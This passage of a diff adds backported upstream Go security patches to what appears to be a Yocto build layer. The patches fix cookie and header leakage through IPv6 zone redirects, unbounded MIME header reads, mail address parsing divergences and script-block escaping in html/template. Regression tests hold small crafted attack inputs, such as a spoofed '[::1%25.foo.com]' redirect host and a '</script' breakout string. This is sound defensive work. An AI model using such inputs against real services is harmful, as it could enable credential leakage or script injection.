index 0000000000..13d3510504
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-45289.patch
@@ -0,0 +1,121 @@
1From 20586c0dbe03d144f914155f879fa5ee287591a1 Mon Sep 17 00:00:00 2001
2From: Damien Neil <dneil@google.com>
3Date: Thu, 11 Jan 2024 11:31:57 -0800
4Subject: [PATCH] [release-branch.go1.21] net/http, net/http/cookiejar: avoid
5 subdomain matches on IPv6 zones
6
7When deciding whether to forward cookies or sensitive headers
8across a redirect, do not attempt to interpret an IPv6 address
9as a domain name.
10
11Avoids a case where a maliciously-crafted redirect to an
12IPv6 address with a scoped addressing zone could be
13misinterpreted as a within-domain redirect. For example,
14we could interpret "::1%.www.example.com" as a subdomain
15of "www.example.com".
16
17Thanks to Juho Nurminen of Mattermost for reporting this issue.
18
19Fixes CVE-2023-45289
20Fixes #65385
21For #65065
22
23Change-Id: I8f463f59f0e700c8a18733d2b264a8bcb3a19599
24Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/2131938
25Reviewed-by: Tatiana Bradley <tatianabradley@google.com>
26Reviewed-by: Roland Shoemaker <bracewell@google.com>
27Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/2173775
28Reviewed-by: Carlos Amedee <amedee@google.com>
29Reviewed-on: https://go-review.googlesource.com/c/go/+/569239
30Reviewed-by: Carlos Amedee <carlos@golang.org>
31Auto-Submit: Michael Knyszek <mknyszek@google.com>
32TryBot-Bypass: Michael Knyszek <mknyszek@google.com>
33
34Upstream-Status: Backport [https://github.com/golang/go/commit/20586c0dbe03d144f914155f879fa5ee287591a1]
35CVE: CVE-2023-45289
36Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
37---
38 src/net/http/client.go | 6 ++++++
39 src/net/http/client_test.go | 1 +
40 src/net/http/cookiejar/jar.go | 7 +++++++
41 src/net/http/cookiejar/jar_test.go | 10 ++++++++++
42 4 files changed, 24 insertions(+)
43
44diff --git a/src/net/http/client.go b/src/net/http/client.go
45index a496f1c..2031834 100644
46--- a/src/net/http/client.go
47+++ b/src/net/http/client.go
48@@ -973,6 +973,12 @@ func isDomainOrSubdomain(sub, parent string) bool {
49 if sub == parent {
50 return true
51 }
52+ // If sub contains a :, it's probably an IPv6 address (and is definitely not a hostname).
53+ // Don't check the suffix in this case, to avoid matching the contents of a IPv6 zone.
54+ // For example, "::1%.www.example.com" is not a subdomain of "www.example.com".
55+ if strings.ContainsAny(sub, ":%") {
56+ return false
57+ }
58 // If sub is "foo.example.com" and parent is "example.com",
59 // that means sub must end in "."+parent.
60 // Do it without allocating.
61diff --git a/src/net/http/client_test.go b/src/net/http/client_test.go
62index 2b4f53f..442fe35 100644
63--- a/src/net/http/client_test.go
64+++ b/src/net/http/client_test.go
65@@ -1703,6 +1703,7 @@ func TestShouldCopyHeaderOnRedirect(t *testing.T) {
66 {"cookie2", "http://foo.com/", "http://bar.com/", false},
67 {"authorization", "http://foo.com/", "http://bar.com/", false},
68 {"www-authenticate", "http://foo.com/", "http://bar.com/", false},
69+ {"authorization", "http://foo.com/", "http://[::1%25.foo.com]/", false},
70
71 // But subdomains should work:
72 {"www-authenticate", "http://foo.com/", "http://foo.com/", true},
73diff --git a/src/net/http/cookiejar/jar.go b/src/net/http/cookiejar/jar.go
74index 9f19917..18cbfc2 100644
75--- a/src/net/http/cookiejar/jar.go
76+++ b/src/net/http/cookiejar/jar.go
77@@ -356,6 +356,13 @@ func jarKey(host string, psl PublicSuffixList) string {
78
79 // isIP reports whether host is an IP address.
80 func isIP(host string) bool {
81+ if strings.ContainsAny(host, ":%") {
82+ // Probable IPv6 address.
83+ // Hostnames can't contain : or %, so this is definitely not a valid host.
84+ // Treating it as an IP is the more conservative option, and avoids the risk
85+ // of interpeting ::1%.www.example.com as a subtomain of www.example.com.
86+ return true
87+ }
88 return net.ParseIP(host) != nil
89 }
90
91diff --git a/src/net/http/cookiejar/jar_test.go b/src/net/http/cookiejar/jar_test.go
92index 47fb1ab..fd8d40e 100644
93--- a/src/net/http/cookiejar/jar_test.go
94+++ b/src/net/http/cookiejar/jar_test.go
95@@ -251,6 +251,7 @@ var isIPTests = map[string]bool{
96 "127.0.0.1": true,
97 "1.2.3.4": true,
98 "2001:4860:0:2001::68": true,
99+ "::1%zone": true,
100 "example.com": false,
101 "1.1.1.300": false,
102 "www.foo.bar.net": false,
103@@ -613,6 +614,15 @@ var basicsTests = [...]jarTest{
104 {"http://www.host.test:1234/", "a=1"},
105 },
106 },
107+ {
108+ "IPv6 zone is not treated as a host.",
109+ "https://example.com/",
110+ []string{"a=1"},
111+ "a=1",
112+ []query{
113+ {"https://[::1%25.example.com]:80/", ""},
114+ },
115+ },
116 }
117
118 func TestBasics(t *testing.T) {
119--
1202.25.1
121
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-45290.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-45290.patch
new file mode 100644
index 0000000000..ddc2f67c96
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-45290.patch
@@ -0,0 +1,271 @@
1From bf80213b121074f4ad9b449410a4d13bae5e9be0 Mon Sep 17 00:00:00 2001
2From: Damien Neil <dneil@google.com>
3Date: Tue, 16 Jan 2024 15:37:52 -0800
4Subject: [PATCH] [release-branch.go1.21] net/textproto, mime/multipart: avoid
5 unbounded read in MIME header
6
7mime/multipart.Reader.ReadForm allows specifying the maximum amount
8of memory that will be consumed by the form. While this limit is
9correctly applied to the parsed form data structure, it was not
10being applied to individual header lines in a form.
11
12For example, when presented with a form containing a header line
13that never ends, ReadForm will continue to read the line until it
14runs out of memory.
15
16Limit the amount of data consumed when reading a header.
17
18Fixes CVE-2023-45290
19Fixes #65389
20For #65383
21
22Change-Id: I7f9264d25752009e95f6b2c80e3d76aaf321d658
23Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/2134435
24Reviewed-by: Roland Shoemaker <bracewell@google.com>
25Reviewed-by: Tatiana Bradley <tatianabradley@google.com>
26Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/2173776
27Reviewed-by: Carlos Amedee <amedee@google.com>
28Reviewed-on: https://go-review.googlesource.com/c/go/+/569240
29Auto-Submit: Michael Knyszek <mknyszek@google.com>
30LUCI-TryBot-Result: Go LUCI <golang-scoped@luci-project-accounts.iam.gserviceaccount.com>
31Reviewed-by: Carlos Amedee <carlos@golang.org>
32
33Upstream-Status: Backport [https://github.com/golang/go/commit/bf80213b121074f4ad9b449410a4d13bae5e9be0]
34CVE: CVE-2023-45290
35Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
36---
37 src/mime/multipart/formdata_test.go | 42 +++++++++++++++++++++++++
38 src/net/textproto/reader.go | 48 ++++++++++++++++++++---------
39 src/net/textproto/reader_test.go | 12 ++++++++
40 3 files changed, 87 insertions(+), 15 deletions(-)
41
42diff --git a/src/mime/multipart/formdata_test.go b/src/mime/multipart/formdata_test.go
43index c78eeb7..f729da6 100644
44--- a/src/mime/multipart/formdata_test.go
45+++ b/src/mime/multipart/formdata_test.go
46@@ -421,6 +421,48 @@ func TestReadFormLimits(t *testing.T) {
47 }
48 }
49
50+func TestReadFormEndlessHeaderLine(t *testing.T) {
51+ for _, test := range []struct {
52+ name string
53+ prefix string
54+ }{{
55+ name: "name",
56+ prefix: "X-",
57+ }, {
58+ name: "value",
59+ prefix: "X-Header: ",
60+ }, {
61+ name: "continuation",
62+ prefix: "X-Header: foo\r\n ",
63+ }} {
64+ t.Run(test.name, func(t *testing.T) {
65+ const eol = "\r\n"
66+ s := `--boundary` + eol
67+ s += `Content-Disposition: form-data; name="a"` + eol
68+ s += `Content-Type: text/plain` + eol
69+ s += test.prefix
70+ fr := io.MultiReader(
71+ strings.NewReader(s),
72+ neverendingReader('X'),
73+ )
74+ r := NewReader(fr, "boundary")
75+ _, err := r.ReadForm(1 << 20)
76+ if err != ErrMessageTooLarge {
77+ t.Fatalf("ReadForm(1 << 20): %v, want ErrMessageTooLarge", err)
78+ }
79+ })
80+ }
81+}
82+
83+type neverendingReader byte
84+
85+func (r neverendingReader) Read(p []byte) (n int, err error) {
86+ for i := range p {
87+ p[i] = byte(r)
88+ }
89+ return len(p), nil
90+}
91+
92 func BenchmarkReadForm(b *testing.B) {
93 for _, test := range []struct {
94 name string
95diff --git a/src/net/textproto/reader.go b/src/net/textproto/reader.go
96index ad2d777..cea6613 100644
97--- a/src/net/textproto/reader.go
98+++ b/src/net/textproto/reader.go
99@@ -17,6 +17,10 @@ import (
100 "sync"
101 )
102
103+// TODO: This should be a distinguishable error (ErrMessageTooLarge)
104+// to allow mime/multipart to detect it.
105+var errMessageTooLarge = errors.New("message too large")
106+
107 // A Reader implements convenience methods for reading requests
108 // or responses from a text protocol network connection.
109 type Reader struct {
110@@ -38,13 +42,13 @@ func NewReader(r *bufio.Reader) *Reader {
111 // ReadLine reads a single line from r,
112 // eliding the final \n or \r\n from the returned string.
113 func (r *Reader) ReadLine() (string, error) {
114- line, err := r.readLineSlice()
115+ line, err := r.readLineSlice(-1)
116 return string(line), err
117 }
118
119 // ReadLineBytes is like ReadLine but returns a []byte instead of a string.
120 func (r *Reader) ReadLineBytes() ([]byte, error) {
121- line, err := r.readLineSlice()
122+ line, err := r.readLineSlice(-1)
123 if line != nil {
124 buf := make([]byte, len(line))
125 copy(buf, line)
126@@ -53,7 +57,10 @@ func (r *Reader) ReadLineBytes() ([]byte, error) {
127 return line, err
128 }
129
130-func (r *Reader) readLineSlice() ([]byte, error) {
131+// readLineSlice reads a single line from r,
132+// up to lim bytes long (or unlimited if lim is less than 0),
133+// eliding the final \r or \r\n from the returned string.
134+func (r *Reader) readLineSlice(lim int64) ([]byte, error) {
135 r.closeDot()
136 var line []byte
137 for {
138@@ -61,6 +68,9 @@ func (r *Reader) readLineSlice() ([]byte, error) {
139 if err != nil {
140 return nil, err
141 }
142+ if lim >= 0 && int64(len(line))+int64(len(l)) > lim {
143+ return nil, errMessageTooLarge
144+ }
145 // Avoid the copy if the first call produced a full line.
146 if line == nil && !more {
147 return l, nil
148@@ -93,7 +103,7 @@ func (r *Reader) readLineSlice() ([]byte, error) {
149 // A line consisting of only white space is never continued.
150 //
151 func (r *Reader) ReadContinuedLine() (string, error) {
152- line, err := r.readContinuedLineSlice(noValidation)
153+ line, err := r.readContinuedLineSlice(-1, noValidation)
154 return string(line), err
155 }
156
157@@ -114,7 +124,7 @@ func trim(s []byte) []byte {
158 // ReadContinuedLineBytes is like ReadContinuedLine but
159 // returns a []byte instead of a string.
160 func (r *Reader) ReadContinuedLineBytes() ([]byte, error) {
161- line, err := r.readContinuedLineSlice(noValidation)
162+ line, err := r.readContinuedLineSlice(-1, noValidation)
163 if line != nil {
164 buf := make([]byte, len(line))
165 copy(buf, line)
166@@ -127,13 +137,14 @@ func (r *Reader) ReadContinuedLineBytes() ([]byte, error) {
167 // returning a byte slice with all lines. The validateFirstLine function
168 // is run on the first read line, and if it returns an error then this
169 // error is returned from readContinuedLineSlice.
170-func (r *Reader) readContinuedLineSlice(validateFirstLine func([]byte) error) ([]byte, error) {
171+// It reads up to lim bytes of data (or unlimited if lim is less than 0).
172+func (r *Reader) readContinuedLineSlice(lim int64, validateFirstLine func([]byte) error) ([]byte, error) {
173 if validateFirstLine == nil {
174 return nil, fmt.Errorf("missing validateFirstLine func")
175 }
176
177 // Read the first line.
178- line, err := r.readLineSlice()
179+ line, err := r.readLineSlice(lim)
180 if err != nil {
181 return nil, err
182 }
183@@ -161,13 +172,21 @@ func (r *Reader) readContinuedLineSlice(validateFirstLine func([]byte) error) ([
184 // copy the slice into buf.
185 r.buf = append(r.buf[:0], trim(line)...)
186
187+ if lim < 0 {
188+ lim = math.MaxInt64
189+ }
190+ lim -= int64(len(r.buf))
191+
192 // Read continuation lines.
193 for r.skipSpace() > 0 {
194- line, err := r.readLineSlice()
195+ r.buf = append(r.buf, ' ')
196+ if int64(len(r.buf)) >= lim {
197+ return nil, errMessageTooLarge
198+ }
199+ line, err := r.readLineSlice(lim - int64(len(r.buf)))
200 if err != nil {
201 break
202 }
203- r.buf = append(r.buf, ' ')
204 r.buf = append(r.buf, trim(line)...)
205 }
206 return r.buf, nil
207@@ -512,7 +531,8 @@ func readMIMEHeader(r *Reader, maxMemory, maxHeaders int64) (MIMEHeader, error)
208
209 // The first line cannot start with a leading space.
210 if buf, err := r.R.Peek(1); err == nil && (buf[0] == ' ' || buf[0] == '\t') {
211- line, err := r.readLineSlice()
212+ const errorLimit = 80 // arbitrary limit on how much of the line we'll quote
213+ line, err := r.readLineSlice(errorLimit)
214 if err != nil {
215 return m, err
216 }
217@@ -520,7 +540,7 @@ func readMIMEHeader(r *Reader, maxMemory, maxHeaders int64) (MIMEHeader, error)
218 }
219
220 for {
221- kv, err := r.readContinuedLineSlice(mustHaveFieldNameColon)
222+ kv, err := r.readContinuedLineSlice(maxMemory, mustHaveFieldNameColon)
223 if len(kv) == 0 {
224 return m, err
225 }
226@@ -541,7 +561,7 @@ func readMIMEHeader(r *Reader, maxMemory, maxHeaders int64) (MIMEHeader, error)
227
228 maxHeaders--
229 if maxHeaders < 0 {
230- return nil, errors.New("message too large")
231+ return nil, errMessageTooLarge
232 }
233
234 // backport 5c55ac9bf1e5f779220294c843526536605f42ab
235@@ -567,9 +587,7 @@ func readMIMEHeader(r *Reader, maxMemory, maxHeaders int64) (MIMEHeader, error)
236 }
237 maxMemory -= int64(len(value))
238 if maxMemory < 0 {
239- // TODO: This should be a distinguishable error (ErrMessageTooLarge)
240- // to allow mime/multipart to detect it.
241- return m, errors.New("message too large")
242+ return m, errMessageTooLarge
243 }
244 if vv == nil && len(strs) > 0 {
245 // More than likely this will be a single-element key.
246diff --git a/src/net/textproto/reader_test.go b/src/net/textproto/reader_test.go
247index 3ae0de1..db1ed91 100644
248--- a/src/net/textproto/reader_test.go
249+++ b/src/net/textproto/reader_test.go
250@@ -34,6 +34,18 @@ func TestReadLine(t *testing.T) {
251 }
252 }
253
254+func TestReadLineLongLine(t *testing.T) {
255+ line := strings.Repeat("12345", 10000)
256+ r := reader(line + "\r\n")
257+ s, err := r.ReadLine()
258+ if err != nil {
259+ t.Fatalf("Line 1: %v", err)
260+ }
261+ if s != line {
262+ t.Fatalf("%v-byte line does not match expected %v-byte line", len(s), len(line))
263+ }
264+}
265+
266 func TestReadContinuedLine(t *testing.T) {
267 r := reader("line1\nline\n 2\nline3\n")
268 s, err := r.ReadContinuedLine()
269--
2702.25.1
271
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2024-24784.patch b/meta/recipes-devtools/go/go-1.14/CVE-2024-24784.patch
new file mode 100644
index 0000000000..e9d9d972b9
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2024-24784.patch
@@ -0,0 +1,205 @@
1From 5330cd225ba54c7dc78c1b46dcdf61a4671a632c Mon Sep 17 00:00:00 2001
2From: Roland Shoemaker <bracewell@google.com>
3Date: Wed, 10 Jan 2024 11:02:14 -0800
4Subject: [PATCH] [release-branch.go1.22] net/mail: properly handle special
5 characters in phrase and obs-phrase
6
7Fixes a couple of misalignments with RFC 5322 which introduce
8significant diffs between (mostly) conformant parsers.
9
10This change reverts the changes made in CL50911, which allowed certain
11special RFC 5322 characters to appear unquoted in the "phrase" syntax.
12It is unclear why this change was made in the first place, and created
13a divergence from comformant parsers. In particular this resulted in
14treating comments in display names incorrectly.
15
16Additionally properly handle trailing malformed comments in the group
17syntax.
18
19For #65083
20Fixed #65849
21
22Change-Id: I00dddc044c6ae3381154e43236632604c390f672
23Reviewed-on: https://go-review.googlesource.com/c/go/+/555596
24Reviewed-by: Damien Neil <dneil@google.com>
25LUCI-TryBot-Result: Go LUCI <golang-scoped@luci-project-accounts.iam.gserviceaccount.com>
26Reviewed-on: https://go-review.googlesource.com/c/go/+/566215
27Reviewed-by: Carlos Amedee <carlos@golang.org>
28
29Upstream-Status: Backport [https://github.com/golang/go/commit/5330cd225ba54c7dc78c1b46dcdf61a4671a632c]
30CVE: CVE-2024-24784
31Signed-off-by: Ashish Sharma <asharma@mvista.com>
32
33 src/net/mail/message.go | 30 +++++++++++++++------------
34 src/net/mail/message_test.go | 40 ++++++++++++++++++++++++++----------
35 2 files changed, 46 insertions(+), 24 deletions(-)
36
37diff --git a/src/net/mail/message.go b/src/net/mail/message.go
38index af516fc30f470..fc2a9e46f811b 100644
39--- a/src/net/mail/message.go
40+++ b/src/net/mail/message.go
41@@ -280,7 +280,7 @@ func (a *Address) String() string {
42 // Add quotes if needed
43 quoteLocal := false
44 for i, r := range local {
45- if isAtext(r, false, false) {
46+ if isAtext(r, false) {
47 continue
48 }
49 if r == '.' {
50@@ -444,7 +444,7 @@ func (p *addrParser) parseAddress(handleGroup bool) ([]*Address, error) {
51 if !p.consume('<') {
52 atext := true
53 for _, r := range displayName {
54- if !isAtext(r, true, false) {
55+ if !isAtext(r, true) {
56 atext = false
57 break
58 }
59@@ -479,7 +479,9 @@ func (p *addrParser) consumeGroupList() ([]*Address, error) {
60 // handle empty group.
61 p.skipSpace()
62 if p.consume(';') {
63- p.skipCFWS()
64+ if !p.skipCFWS() {
65+ return nil, errors.New("mail: misformatted parenthetical comment")
66+ }
67 return group, nil
68 }
69
70@@ -496,7 +498,9 @@ func (p *addrParser) consumeGroupList() ([]*Address, error) {
71 return nil, errors.New("mail: misformatted parenthetical comment")
72 }
73 if p.consume(';') {
74- p.skipCFWS()
75+ if !p.skipCFWS() {
76+ return nil, errors.New("mail: misformatted parenthetical comment")
77+ }
78 break
79 }
80 if !p.consume(',') {
81@@ -566,6 +570,12 @@ func (p *addrParser) consumePhrase() (phrase string, err error) {
82 var words []string
83 var isPrevEncoded bool
84 for {
85+ // obs-phrase allows CFWS after one word
86+ if len(words) > 0 {
87+ if !p.skipCFWS() {
88+ return "", errors.New("mail: misformatted parenthetical comment")
89+ }
90+ }
91 // word = atom / quoted-string
92 var word string
93 p.skipSpace()
94@@ -661,7 +671,6 @@ Loop:
95 // If dot is true, consumeAtom parses an RFC 5322 dot-atom instead.
96 // If permissive is true, consumeAtom will not fail on:
97 // - leading/trailing/double dots in the atom (see golang.org/issue/4938)
98-// - special characters (RFC 5322 3.2.3) except '<', '>', ':' and '"' (see golang.org/issue/21018)
99 func (p *addrParser) consumeAtom(dot bool, permissive bool) (atom string, err error) {
100 i := 0
101
102@@ -672,7 +681,7 @@ Loop:
103 case size == 1 && r == utf8.RuneError:
104 return "", fmt.Errorf("mail: invalid utf-8 in address: %q", p.s)
105
106- case size == 0 || !isAtext(r, dot, permissive):
107+ case size == 0 || !isAtext(r, dot):
108 break Loop
109
110 default:
111@@ -850,18 +859,13 @@ func (e charsetError) Error() string {
112
113 // isAtext reports whether r is an RFC 5322 atext character.
114 // If dot is true, period is included.
115-// If permissive is true, RFC 5322 3.2.3 specials is included,
116-// except '<', '>', ':' and '"'.
117-func isAtext(r rune, dot, permissive bool) bool {
118+func isAtext(r rune, dot bool) bool {
119 switch r {
120 case '.':
121 return dot
122
123 // RFC 5322 3.2.3. specials
124- case '(', ')', '[', ']', ';', '@', '\\', ',':
125- return permissive
126-
127- case '<', '>', '"', ':':
128+ case '(', ')', '<', '>', '[', ']', ':', ';', '@', '\\', ',', '"': // RFC 5322 3.2.3. specials
129 return false
130 }
131 return isVchar(r)
132diff --git a/src/net/mail/message_test.go b/src/net/mail/message_test.go
133index 1e1bb4092f659..1f2f62afbf406 100644
134--- a/src/net/mail/message_test.go
135+++ b/src/net/mail/message_test.go
136@@ -385,8 +385,11 @@ func TestAddressParsingError(t *testing.T) {
137 13: {"group not closed: null@example.com", "expected comma"},
138 14: {"group: first@example.com, second@example.com;", "group with multiple addresses"},
139 15: {"john.doe", "missing '@' or angle-addr"},
140- 16: {"john.doe@", "no angle-addr"},
141+ 16: {"john.doe@", "missing '@' or angle-addr"},
142 17: {"John Doe@foo.bar", "no angle-addr"},
143+ 18: {" group: null@example.com; (asd", "misformatted parenthetical comment"},
144+ 19: {" group: ; (asd", "misformatted parenthetical comment"},
145+ 20: {`(John) Doe <jdoe@machine.example>`, "missing word in phrase:"},
146 }
147
148 for i, tc := range mustErrTestCases {
149@@ -436,24 +439,19 @@ func TestAddressParsing(t *testing.T) {
150 Address: "john.q.public@example.com",
151 }},
152 },
153- {
154- `"John (middle) Doe" <jdoe@machine.example>`,
155- []*Address{{
156- Name: "John (middle) Doe",
157- Address: "jdoe@machine.example",
158- }},
159- },
160+ // Comment in display name
161 {
162 `John (middle) Doe <jdoe@machine.example>`,
163 []*Address{{
164- Name: "John (middle) Doe",
165+ Name: "John Doe",
166 Address: "jdoe@machine.example",
167 }},
168 },
169+ // Display name is quoted string, so comment is not a comment
170 {
171- `John !@M@! Doe <jdoe@machine.example>`,
172+ `"John (middle) Doe" <jdoe@machine.example>`,
173 []*Address{{
174- Name: "John !@M@! Doe",
175+ Name: "John (middle) Doe",
176 Address: "jdoe@machine.example",
177 }},
178 },
179@@ -788,6 +786,26 @@ func TestAddressParsing(t *testing.T) {
180 },
181 },
182 },
183+ // Comment in group display name
184+ {
185+ `group (comment:): a@example.com, b@example.com;`,
186+ []*Address{
187+ {
188+ Address: "a@example.com",
189+ },
190+ {
191+ Address: "b@example.com",
192+ },
193+ },
194+ },
195+ {
196+ `x(:"):"@a.example;("@b.example;`,
197+ []*Address{
198+ {
199+ Address: `@a.example;(@b.example`,
200+ },
201+ },
202+ },
203 }
204 for _, test := range tests {
205 if len(test.exp) == 1 {
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2024-24785.patch b/meta/recipes-devtools/go/go-1.14/CVE-2024-24785.patch
new file mode 100644
index 0000000000..1398a2ca48
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2024-24785.patch
@@ -0,0 +1,197 @@
1From 3643147a29352ca2894fd5d0d2069bc4b4335a7e Mon Sep 17 00:00:00 2001
2From: Roland Shoemaker <roland@golang.org>
3Date: Wed, 14 Feb 2024 17:18:36 -0800
4Subject: [PATCH] [release-branch.go1.21] html/template: escape additional
5 tokens in MarshalJSON errors
6
7Escape "</script" and "<!--" in errors returned from MarshalJSON errors
8when attempting to marshal types in script blocks. This prevents any
9user controlled content from prematurely terminating the script block.
10
11Updates #65697
12Fixes #65968
13
14Change-Id: Icf0e26c54ea7d9c1deed0bff11b6506c99ddef1b
15Reviewed-on: https://go-review.googlesource.com/c/go/+/564196
16LUCI-TryBot-Result: Go LUCI <golang-scoped@luci-project-accounts.iam.gserviceaccount.com>
17Reviewed-by: Damien Neil <dneil@google.com>
18(cherry picked from commit ccbc725f2d678255df1bd326fa511a492aa3a0aa)
19Reviewed-on: https://go-review.googlesource.com/c/go/+/567515
20Reviewed-by: Carlos Amedee <carlos@golang.org>
21
22Upstream-Status: Backport [https://github.com/golang/go/commit/3643147a29352ca2894fd5d0d2069bc4b4335a7e]
23CVE: CVE-2024-24785
24Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
25---
26 src/html/template/js.go | 22 ++++++++-
27 src/html/template/js_test.go | 96 ++++++++++++++++++++----------------
28 2 files changed, 74 insertions(+), 44 deletions(-)
29
30diff --git a/src/html/template/js.go b/src/html/template/js.go
31index 35994f0..4d3b25d 100644
32--- a/src/html/template/js.go
33+++ b/src/html/template/js.go
34@@ -171,13 +171,31 @@ func jsValEscaper(args ...interface{}) string {
35 // cyclic data. This may be an unacceptable DoS risk.
36 b, err := json.Marshal(a)
37 if err != nil {
38- // Put a space before comment so that if it is flush against
39+ // While the standard JSON marshaller does not include user controlled
40+ // information in the error message, if a type has a MarshalJSON method,
41+ // the content of the error message is not guaranteed. Since we insert
42+ // the error into the template, as part of a comment, we attempt to
43+ // prevent the error from either terminating the comment, or the script
44+ // block itself.
45+ //
46+ // In particular we:
47+ // * replace "*/" comment end tokens with "* /", which does not
48+ // terminate the comment
49+ // * replace "</script" with "\x3C/script", and "<!--" with
50+ // "\x3C!--", which prevents confusing script block termination
51+ // semantics
52+ //
53+ // We also put a space before the comment so that if it is flush against
54 // a division operator it is not turned into a line comment:
55 // x/{{y}}
56 // turning into
57 // x//* error marshaling y:
58 // second line of error message */null
59- return fmt.Sprintf(" /* %s */null ", strings.ReplaceAll(err.Error(), "*/", "* /"))
60+ errStr := err.Error()
61+ errStr = strings.ReplaceAll(errStr, "*/", "* /")
62+ errStr = strings.ReplaceAll(errStr, "</script", `\x3C/script`)
63+ errStr = strings.ReplaceAll(errStr, "<!--", `\x3C!--`)
64+ return fmt.Sprintf(" /* %s */null ", errStr)
65 }
66
67 // TODO: maybe post-process output to prevent it from containing
68diff --git a/src/html/template/js_test.go b/src/html/template/js_test.go
69index de9ef28..3fc3baf 100644
70--- a/src/html/template/js_test.go
71+++ b/src/html/template/js_test.go
72@@ -5,6 +5,7 @@
73 package template
74
75 import (
76+ "errors"
77 "bytes"
78 "math"
79 "strings"
80@@ -104,61 +105,72 @@ func TestNextJsCtx(t *testing.T) {
81 }
82 }
83
84+type jsonErrType struct{}
85+
86+func (e *jsonErrType) MarshalJSON() ([]byte, error) {
87+ return nil, errors.New("beep */ boop </script blip <!--")
88+}
89+
90 func TestJSValEscaper(t *testing.T) {
91 tests := []struct {
92- x interface{}
93- js string
94+ x interface{}
95+ js string
96+ skipNest bool
97 }{
98- {int(42), " 42 "},
99- {uint(42), " 42 "},
100- {int16(42), " 42 "},
101- {uint16(42), " 42 "},
102- {int32(-42), " -42 "},
103- {uint32(42), " 42 "},
104- {int16(-42), " -42 "},
105- {uint16(42), " 42 "},
106- {int64(-42), " -42 "},
107- {uint64(42), " 42 "},
108- {uint64(1) << 53, " 9007199254740992 "},
109+ {int(42), " 42 ", false},
110+ {uint(42), " 42 ", false},
111+ {int16(42), " 42 ", false},
112+ {uint16(42), " 42 ", false},
113+ {int32(-42), " -42 ", false},
114+ {uint32(42), " 42 ", false},
115+ {int16(-42), " -42 ", false},
116+ {uint16(42), " 42 ", false},
117+ {int64(-42), " -42 ", false},
118+ {uint64(42), " 42 ", false},
119+ {uint64(1) << 53, " 9007199254740992 ", false},
120 // ulp(1 << 53) > 1 so this loses precision in JS
121 // but it is still a representable integer literal.
122- {uint64(1)<<53 + 1, " 9007199254740993 "},
123- {float32(1.0), " 1 "},
124- {float32(-1.0), " -1 "},
125- {float32(0.5), " 0.5 "},
126- {float32(-0.5), " -0.5 "},
127- {float32(1.0) / float32(256), " 0.00390625 "},
128- {float32(0), " 0 "},
129- {math.Copysign(0, -1), " -0 "},
130- {float64(1.0), " 1 "},
131- {float64(-1.0), " -1 "},
132- {float64(0.5), " 0.5 "},
133- {float64(-0.5), " -0.5 "},
134- {float64(0), " 0 "},
135- {math.Copysign(0, -1), " -0 "},
136- {"", `""`},
137- {"foo", `"foo"`},
138+ {uint64(1)<<53 + 1, " 9007199254740993 ", false},
139+ {float32(1.0), " 1 ", false},
140+ {float32(-1.0), " -1 ", false},
141+ {float32(0.5), " 0.5 ", false},
142+ {float32(-0.5), " -0.5 ", false},
143+ {float32(1.0) / float32(256), " 0.00390625 ", false},
144+ {float32(0), " 0 ", false},
145+ {math.Copysign(0, -1), " -0 ", false},
146+ {float64(1.0), " 1 ", false},
147+ {float64(-1.0), " -1 ", false},
148+ {float64(0.5), " 0.5 ", false},
149+ {float64(-0.5), " -0.5 ", false},
150+ {float64(0), " 0 ", false},
151+ {math.Copysign(0, -1), " -0 ", false},
152+ {"", `""`, false},
153+ {"foo", `"foo"`, false},
154 // Newlines.
155- {"\r\n\u2028\u2029", `"\r\n\u2028\u2029"`},
156+ {"\r\n\u2028\u2029", `"\r\n\u2028\u2029"`, false},
157 // "\v" == "v" on IE 6 so use "\u000b" instead.
158- {"\t\x0b", `"\t\u000b"`},
159- {struct{ X, Y int }{1, 2}, `{"X":1,"Y":2}`},
160- {[]interface{}{}, "[]"},
161- {[]interface{}{42, "foo", nil}, `[42,"foo",null]`},
162- {[]string{"<!--", "</script>", "-->"}, `["\u003c!--","\u003c/script\u003e","--\u003e"]`},
163- {"<!--", `"\u003c!--"`},
164- {"-->", `"--\u003e"`},
165- {"<![CDATA[", `"\u003c![CDATA["`},
166- {"]]>", `"]]\u003e"`},
167- {"</script", `"\u003c/script"`},
168- {"\U0001D11E", "\"\U0001D11E\""}, // or "\uD834\uDD1E"
169- {nil, " null "},
170+ {"\t\x0b", `"\t\u000b"`, false},
171+ {struct{ X, Y int }{1, 2}, `{"X":1,"Y":2}`, false},
172+ {[]interface{}{}, "[]", false},
173+ {[]interface{}{42, "foo", nil}, `[42,"foo",null]`, false},
174+ {[]string{"<!--", "</script>", "-->"}, `["\u003c!--","\u003c/script\u003e","--\u003e"]`, false},
175+ {"<!--", `"\u003c!--"`, false},
176+ {"-->", `"--\u003e"`, false},
177+ {"<![CDATA[", `"\u003c![CDATA["`, false},
178+ {"]]>", `"]]\u003e"`, false},
179+ {"</script", `"\u003c/script"`, false},
180+ {"\U0001D11E", "\"\U0001D11E\"", false}, // or "\uD834\uDD1E"
181+ {nil, " null ", false},
182+ {&jsonErrType{}, " /* json: error calling MarshalJSON for type *template.jsonErrType: beep * / boop \\x3C/script blip \\x3C!-- */null ", true},
183 }
184
185 for _, test := range tests {
186 if js := jsValEscaper(test.x); js != test.js {
187 t.Errorf("%+v: want\n\t%q\ngot\n\t%q", test.x, test.js, js)
188 }
189+ if test.skipNest {
190+ continue
191+ }
192 // Make sure that escaping corner cases are not broken
193 // by nesting.
194 a := []interface{}{test.x}
195--
1962.25.1
197
diff --git a/meta/recipes-devtools/go/go-crosssdk.inc b/meta/recipes-devtools/go/go-crosssdk.inc
index f0bec79719..36c9b12af8 100644
--- a/meta/recipes-devtools/go/go-crosssdk.inc
